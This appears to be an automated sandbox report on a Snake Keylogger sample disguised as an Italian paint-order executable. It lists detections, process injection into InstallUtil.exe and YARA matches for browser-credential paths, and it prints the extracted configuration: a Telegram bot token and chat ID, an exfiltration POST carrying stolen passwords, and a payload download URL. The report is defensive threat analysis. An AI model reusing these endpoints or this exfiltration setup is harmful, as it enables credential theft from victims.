Edit tour

Windows Analysis Report
Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Overview

General Information

Sample name:	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Analysis ID:	1592710
MD5:	2d080f1e0be3ec95d49f138a5e9c4d4f
SHA1:	22c49e1c1202336494504a101c1de5ac112d37e5
SHA256:	c44d3e15034c029b6a3fb3571c9bfca998863ba209c5c354edce1bf0316a9e42
Tags:	exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe (PID: 6332 cmdline: "C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe" MD5: 2D080F1E0BE3EC95D49F138A5E9C4D4F)

InstallUtil.exe (PID: 2676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage?chat_id=6287380231", "Token": "8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8", "Chat_id": "6287380231", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15141:$a1: get_encryptedPassword 0x15425:$a2: get_encryptedUsername 0x14f4d:$a3: get_timePasswordChanged 0x15048:$a4: get_passwordField 0x15157:$a5: set_encryptedPassword 0x16797:$a7: get_logins 0x166fa:$a10: KeyLoggerEventArgs 0x16365:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a1e4:$x1: $%SMTPDV$ 0x18ac4:$x2: $#TheHashHere%& 0x1a18c:$x3: %FTPDV$ 0x18a64:$x4: $%TelegramDv$ 0x16365:$x5: KeyLoggerEventArgs 0x166fa:$x5: KeyLoggerEventArgs 0x1a1b0:$m2: Clipboard Logs ID 0x1a3ee:$m2: Screenshot Logs ID 0x1a4fe:$m2: keystroke Logs ID 0x1a7d8:$m3: SnakePW 0x1a3c6:$m4: \SnakeKeylogger\
00000003.00000002.4589297423.000000000284C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x142b9:$a1: get_encryptedPassword 0x1459d:$a2: get_encryptedUsername 0x140c5:$a3: get_timePasswordChanged 0x141c0:$a4: get_passwordField 0x142cf:$a5: set_encryptedPassword 0x1590f:$a7: get_logins 0x15872:$a10: KeyLoggerEventArgs 0x154dd:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1935c:$x1: $%SMTPDV$ 0x17c3c:$x2: $#TheHashHere%& 0x19304:$x3: %FTPDV$ 0x17bdc:$x4: $%TelegramDv$ 0x154dd:$x5: KeyLoggerEventArgs 0x15872:$x5: KeyLoggerEventArgs 0x19328:$m2: Clipboard Logs ID 0x19566:$m2: Screenshot Logs ID 0x19676:$m2: keystroke Logs ID 0x19950:$m3: SnakePW 0x1953e:$m4: \SnakeKeylogger\
00000000.00000002.2417201892.0000000005DD0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.4589297423.00000000027BF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x63429:$a1: get_encryptedPassword 0x6370d:$a2: get_encryptedUsername 0x63235:$a3: get_timePasswordChanged 0x63330:$a4: get_passwordField 0x6343f:$a5: set_encryptedPassword 0x64a7f:$a7: get_logins 0x649e2:$a10: KeyLoggerEventArgs 0x6464d:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x684cc:$x1: $%SMTPDV$ 0x66dac:$x2: $#TheHashHere%& 0x68474:$x3: %FTPDV$ 0x66d4c:$x4: $%TelegramDv$ 0x6464d:$x5: KeyLoggerEventArgs 0x649e2:$x5: KeyLoggerEventArgs 0x68498:$m2: Clipboard Logs ID 0x686d6:$m2: Screenshot Logs ID 0x687e6:$m2: keystroke Logs ID 0x68ac0:$m3: SnakePW 0x686ae:$m4: \SnakeKeylogger\
00000000.00000002.2401541375.0000000002E94000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.4589297423.0000000002601000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5e7a7:$a1: get_encryptedPassword 0xac673:$a1: get_encryptedPassword 0x5e976:$a2: get_encryptedUsername 0xac94d:$a2: get_encryptedUsername 0x5e5d0:$a3: get_timePasswordChanged 0xac489:$a3: get_timePasswordChanged 0x5e6bf:$a4: get_passwordField 0xac584:$a4: get_passwordField 0x5e7bd:$a5: set_encryptedPassword 0xac689:$a5: set_encryptedPassword 0x605dd:$a7: get_logins 0xaeb76:$a7: get_logins 0x6054a:$a10: KeyLoggerEventArgs 0xaead9:$a10: KeyLoggerEventArgs 0x60273:$a11: KeyLoggerEventArgsEventHandler 0xae744:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x60273:$x5: KeyLoggerEventArgs 0x6054a:$x5: KeyLoggerEventArgs 0x60cdb:$x5: KeyLoggerEventArgs 0x6103c:$x5: KeyLoggerEventArgs 0xae744:$x5: KeyLoggerEventArgs 0xaead9:$x5: KeyLoggerEventArgs 0xaf3e0:$x5: KeyLoggerEventArgs 0xaf741:$x5: KeyLoggerEventArgs 0x625e5:$m2: Clipboard Logs ID 0x626eb:$m2: Screenshot Logs ID 0x62741:$m2: keystroke Logs ID 0xb0d8a:$m2: Clipboard Logs ID 0xb0e90:$m2: Screenshot Logs ID 0xb0ee6:$m2: keystroke Logs ID 0x62876:$m3: SnakePW 0xb101b:$m3: SnakePW 0x626d7:$m4: \SnakeKeylogger\ 0xb0e7c:$m4: \SnakeKeylogger\
Process Memory Space: InstallUtil.exe PID: 2676	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 2676	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: InstallUtil.exe PID: 2676	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x468a2:$a1: get_encryptedPassword 0x46b7c:$a2: get_encryptedUsername 0x466b8:$a3: get_timePasswordChanged 0x467b3:$a4: get_passwordField 0x468b8:$a5: set_encryptedPassword 0x48da5:$a7: get_logins 0x48d08:$a10: KeyLoggerEventArgs 0x48973:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 2676	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x48973:$x5: KeyLoggerEventArgs 0x48d08:$x5: KeyLoggerEventArgs 0x4960f:$x5: KeyLoggerEventArgs 0x49970:$x5: KeyLoggerEventArgs 0x4afb9:$m2: Clipboard Logs ID 0x4b0bf:$m2: Screenshot Logs ID 0x4b115:$m2: keystroke Logs ID 0x1627e:$m3: SnakePW 0x4b24a:$m3: SnakePW 0x503f6:$m3: SnakePW 0x56302:$m3: SnakePW 0x5650b:$m3: SnakePW 0x56716:$m3: SnakePW 0x681f1:$m3: SnakePW 0x685c8:$m3: SnakePW 0x68897:$m3: SnakePW 0x4b0ab:$m4: \SnakeKeylogger\
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.5dd0000.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.5dd0000.5.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x126b9:$a1: get_encryptedPassword 0x1299d:$a2: get_encryptedUsername 0x124c5:$a3: get_timePasswordChanged 0x125c0:$a4: get_passwordField 0x126cf:$a5: set_encryptedPassword 0x13d0f:$a7: get_logins 0x13c72:$a10: KeyLoggerEventArgs 0x138dd:$a11: KeyLoggerEventArgsEventHandler
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a14a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1937c:$a3: \Google\Chrome\User Data\Default\Login Data 0x197af:$a4: \Orbitum\User Data\Default\Login Data 0x1a7ee:$a5: \Kometa\User Data\Default\Login Data
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13276:$s1: UnHook 0x1327d:$s2: SetHook 0x13285:$s3: CallNextHook 0x13292:$s4: _hook
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1775c:$x1: $%SMTPDV$ 0x1603c:$x2: $#TheHashHere%& 0x17704:$x3: %FTPDV$ 0x15fdc:$x4: $%TelegramDv$ 0x138dd:$x5: KeyLoggerEventArgs 0x13c72:$x5: KeyLoggerEventArgs 0x17728:$m2: Clipboard Logs ID 0x17966:$m2: Screenshot Logs ID 0x17a76:$m2: keystroke Logs ID 0x17d50:$m3: SnakePW 0x1793e:$m4: \SnakeKeylogger\
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x144b9:$a1: get_encryptedPassword 0x1479d:$a2: get_encryptedUsername 0x142c5:$a3: get_timePasswordChanged 0x143c0:$a4: get_passwordField 0x144cf:$a5: set_encryptedPassword 0x15b0f:$a7: get_logins 0x15a72:$a10: KeyLoggerEventArgs 0x156dd:$a11: KeyLoggerEventArgsEventHandler
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bf4a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b17c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b5af:$a4: \Orbitum\User Data\Default\Login Data 0x1c5ee:$a5: \Kometa\User Data\Default\Login Data
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15076:$s1: UnHook 0x1507d:$s2: SetHook 0x15085:$s3: CallNextHook 0x15092:$s4: _hook
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1955c:$x1: $%SMTPDV$ 0x17e3c:$x2: $#TheHashHere%& 0x19504:$x3: %FTPDV$ 0x17ddc:$x4: $%TelegramDv$ 0x156dd:$x5: KeyLoggerEventArgs 0x15a72:$x5: KeyLoggerEventArgs 0x19528:$m2: Clipboard Logs ID 0x19766:$m2: Screenshot Logs ID 0x19876:$m2: keystroke Logs ID 0x19b50:$m3: SnakePW 0x1973e:$m4: \SnakeKeylogger\
3.2.InstallUtil.exe.5b0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.InstallUtil.exe.5b0000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.InstallUtil.exe.5b0000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x144b9:$a1: get_encryptedPassword 0x1479d:$a2: get_encryptedUsername 0x142c5:$a3: get_timePasswordChanged 0x143c0:$a4: get_passwordField 0x144cf:$a5: set_encryptedPassword 0x15b0f:$a7: get_logins 0x15a72:$a10: KeyLoggerEventArgs 0x156dd:$a11: KeyLoggerEventArgsEventHandler
3.2.InstallUtil.exe.5b0000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bf4a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b17c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b5af:$a4: \Orbitum\User Data\Default\Login Data 0x1c5ee:$a5: \Kometa\User Data\Default\Login Data
3.2.InstallUtil.exe.5b0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15076:$s1: UnHook 0x1507d:$s2: SetHook 0x15085:$s3: CallNextHook 0x15092:$s4: _hook
3.2.InstallUtil.exe.5b0000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1955c:$x1: $%SMTPDV$ 0x17e3c:$x2: $#TheHashHere%& 0x19504:$x3: %FTPDV$ 0x17ddc:$x4: $%TelegramDv$ 0x156dd:$x5: KeyLoggerEventArgs 0x15a72:$x5: KeyLoggerEventArgs 0x19528:$m2: Clipboard Logs ID 0x19766:$m2: Screenshot Logs ID 0x19876:$m2: keystroke Logs ID 0x19b50:$m3: SnakePW 0x1973e:$m4: \SnakeKeylogger\
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x62cd9:$a1: get_encryptedPassword 0x62fbd:$a2: get_encryptedUsername 0x62ae5:$a3: get_timePasswordChanged 0x62be0:$a4: get_passwordField 0x62cef:$a5: set_encryptedPassword 0x6432f:$a7: get_logins 0x64292:$a10: KeyLoggerEventArgs 0x63efd:$a11: KeyLoggerEventArgsEventHandler
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x6a76a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x6999c:$a3: \Google\Chrome\User Data\Default\Login Data 0x69dcf:$a4: \Orbitum\User Data\Default\Login Data 0x6ae0e:$a5: \Kometa\User Data\Default\Login Data
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x63896:$s1: UnHook 0x6389d:$s2: SetHook 0x638a5:$s3: CallNextHook 0x638b2:$s4: _hook
0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x67d7c:$x1: $%SMTPDV$ 0x6665c:$x2: $#TheHashHere%& 0x67d24:$x3: %FTPDV$ 0x665fc:$x4: $%TelegramDv$ 0x63efd:$x5: KeyLoggerEventArgs 0x64292:$x5: KeyLoggerEventArgs 0x67d48:$m2: Clipboard Logs ID 0x67f86:$m2: Screenshot Logs ID 0x68096:$m2: keystroke Logs ID 0x68370:$m3: SnakePW 0x67f5e:$m4: \SnakeKeylogger\
Click to see the 20 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T13:10:31.291439+0100	2803305	3	Unknown Traffic	192.168.2.6	49864	104.21.48.1	443	TCP
2025-01-16T13:10:38.921625+0100	2803305	3	Unknown Traffic	192.168.2.6	49926	104.21.48.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T13:10:29.760764+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49852	193.122.6.168	80	TCP
2025-01-16T13:10:30.729512+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49852	193.122.6.168	80	TCP
2025-01-16T13:10:32.010791+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49870	193.122.6.168	80	TCP

ETPRO MALWARE Snake Keylogger Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T13:10:45.409321+0100	2853006	1	A Network Trojan was detected	192.168.2.6	49962	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T13:10:44.827849+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49962	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd36a1470e4a51Host: api.telegram.orgContent-Length: 572Connection: Keep-Alive

Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://160.22.121.182
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://160.22.121.182/STATO/Gihdpimpq.mp4
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	String found in binary or memory: http://160.22.121.182/STATO/Gihdpimpq.mp415V9qXFmSrEpcl2I4Ku6Bqw==
Source: InstallUtil.exe, 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: InstallUtil.exe, 00000003.00000002.4589297423.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002775000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002767000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002748000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002759000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: InstallUtil.exe, 00000003.00000002.4589297423.0000000002601000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000026FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002775000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002767000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002748000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002783000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002759000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000003.00000002.4589297423.0000000002601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000003.00000002.4589297423.00000000026D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002775000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002767000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002748000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002759000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: InstallUtil.exe, 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: InstallUtil.exe, 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
